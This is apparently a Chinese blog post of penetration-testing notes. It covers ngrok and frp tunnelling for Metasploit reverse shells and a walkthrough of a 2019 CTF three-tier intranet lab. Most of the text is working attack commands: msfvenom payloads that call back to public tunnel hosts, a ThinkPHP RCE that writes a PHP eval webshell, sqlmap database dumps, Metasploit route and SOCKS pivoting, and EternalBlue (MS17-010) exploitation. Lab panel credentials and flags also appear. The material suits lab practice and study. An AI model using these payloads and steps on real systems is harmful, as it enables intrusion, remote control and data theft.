赞
踩
linux查看系统位数—uname -m
(虚拟机kali的)
协议:http 本地端口:192.168.80.137:4444
测试:内网win7 执行后门—免费主机处理—内网 kali 监听—内网 kali 接受器
./sunny clientid 隧道号
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit
./sunny clientid 隧道号
msfvenom -p windows/meterpreter/reverse_http lhost=liandy.free.idcfengye.com lport=80 -f exe -o test.exe
3、配置并监听(一旦liandy.free.idcfengye.com有流量,就发给本地192.168.80.136:4444)
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit
4、在windows7运行test.exe
一直没出结果,test运行一会儿,进程就停止了。可能需要做免杀,不过无伤大雅!
服务器修改配置文件 frps.ini:
[common]
bind_port = 7000
启动服务端:
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 7000 #frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的 5555
remote_port = 6000 #服务端用 6000 端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
此时服务端收到端口连接
msfvenom -p windows/meterpreter/reverse_tcp lhost=你的云主机ip lport=6000 -f exe -o frp.exe
后面放到靶机运行 frp.exe 即可
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
frp.exe运行后,监听到会话(现在看起来,案例一应该是那个网站的问题,自己搭建的还是比较靠谱!)
来源2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个Flag对应一个积分,获取三个Flag结尾。
CFS三层靶机环境:
链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg
提取码: dkcp
解压密码:teamssix.com
设置虚拟机网卡(新建两个仅主机模式的网卡)
VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0
VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.0
配置虚拟机网卡
虚拟机网卡ip显示
开启Web服务:
宝塔后台登陆地址及密码:
http://靶机外网ip:8888/a768f109/
账号:eaj3yhsl,密码:41bb8fee,根据靶机实际ip,配置即可
首先nmap扫描一下192.168.80.1这个网段开放了那些服务。
web网站是TP5框架
Thinkphp5.x工具测试,确认存在漏洞。
命令执行,打印当前路径
通过命令可以直接写入后门(一键功能getshell用不了)
echo '<?php @eval($_POST[x]);?>' > /www/wwwroot/ThinkPHP/public/shell.php
访问一下shell.php 验证写入成功!
蚁剑连接
在robots.txt以及flag21sA.txt分别发现flag
flag{QeaRqaw12fs} flag{e2D3aFdasde}
上传信息收集脚本,进行提权信息收集,进行信息再收集。
chmod +x LinEnum.sh
./LinEnum.sh
这里运行无回显。具体是什么原因不清楚,大概是权限不够,或者被拦截。那就看一下网络配置。
ipconfig
ip addr show
ip a show dev 网络接口
这里可以看到有192.168.22.129这个ip。
连接上target1之后,可以用target1当做跳板,但是蚁剑比较麻烦,此时可以改用CS神器或者MSF,因为使用CS或者MSF时,即使权限不够,我们也可以进行一些操作。
接下来我们开始渗透Target2。kali直接与target2连接是连不上的。因为kali网段是80,target2网段是22,二者不在同一个网段,无法互联,但是target1网段是80和22,target1既跟kali同一网段,又跟target2同一网段,因此,我们可以将target1作为跳板,实现kali和target2的互联。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.80.137 LPORT=1111 -f elf >t1.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.80.137
set LPORT 1111
exploit
通过蚁剑上传后门、执行后门
chmod +x t1.elf
./t1.elf
此时接收到会话
由于测试环境是我们自己准备的,所以我们知道target2主机的网段及IP地址。但是在实战中,我们应该是未知的,因此我们需要首先进行信息收集,以获得目标target2的相关信息,为进一步的渗透做准备。
run get_local_subnets
这里target1存在3个网络接口,一个122、一个80,一个22,80与kali同一网段,是连接外网的,那22就是连接内网(局域网),其实刚才已经收集到这些信息。(122这里不清楚具体是干什么的,可能是前人的配置,毕竟实验环境是在网上找的。)
run autoroute -p
发现路由表是空的。我们需要添加路由地址
run autoroute -s 192.168.22.0/24
并且查看路由表,已更新。
添加路由地址成功,说明在刚才反弹的session1会话上,我们添加了一个22网段的网络接口。此时我们就可以通过这个路由跟22网段进行通讯了。虽然能够通讯了,但是我们的目标是攻击target2,要攻击就需要使用到工具,由于路由是写到了msf建立的会话上面,有些工具没法用。此时我们就需要开一个代理,开这个代理就相当于开一个接口给其他人用。
use auxiliary/server/socks_proxy
set version 4a
set srvport 2222
exploit
找到proxychains.conf文件,linux是/etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.22.0/24
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80 //这里是为了快速扫描
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect
发现192.168.22.128:80开放129是target1 的内网ip
proxychains nmap -sT -Pn 192.168.22.129
这里好像原本设置的网站IP不是我设置的192.168.22.129,还需要看一下配置,改一下
自己搭建实验环境就是意外百出!!!
rm -f /www/server/panel/data/admin_path.pl
192.168.22.128:8888/2cc52ec0
username: xdynr37d
password: 766e248d
默认账户密码不顶用,我吐了!又是一番周折,重置了密码。
Bt(宝塔面板)忘记用户名密码的解决方案 - 走看看 (zoukankan.com)
更改成自己实验环境的ip
终于能访问了
明确给出SQL注入漏洞点。
http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入
通过robots.txt文件找到了后台地址(网上查找资料即可补全)
http://192.168.22.128/index.php?r=admini/public/login #后台
通过sqlmap获取账户密码,后台进行登录。
#爆库名
sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword --dbs
#爆表名
sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables
#爆列名
sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns
#脱库
sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
后台账户密码admin :123qwe
找到flag{eS3sd1IKarw}
找到模板修改处,添加一句话。
<?php @eval($_POST[x]);?>
http://192.168.22.128/index.php?r=tag #后门shell
访问
找到flag
flag{23ASfqwr4t2e}
如果攻击机是windows的话,还可以利用代理工具Proxifier或SocksCap64载入代理进行远程访问测试。
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
chmod +x t2.elf
./t2.elf
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24
接下来对3333端口进行攻击,由于目标主机是windows系统,我们以前讲过很多攻击工具,比如,namp --script=all、namp --script=vuln、nessus等
探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG
探针目标,发现开放了445和3389端口,且存在MS17010漏洞。(永恒之蓝)
proxychains4 nmap -Pn -sT 192.168.33.33
利用MS17010获取系统权限
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
exploit
监听到会话,得到system权限。
搜索关键字,得到第3个flag
shell
dir /S flag.txt /B
type C:\Users\Administrator\Desktop\flag.txt
Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器
frp多层socks代理+端口映射_PANDA-墨森的博客-CSDN博客_frp多层代理
赞
踩
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。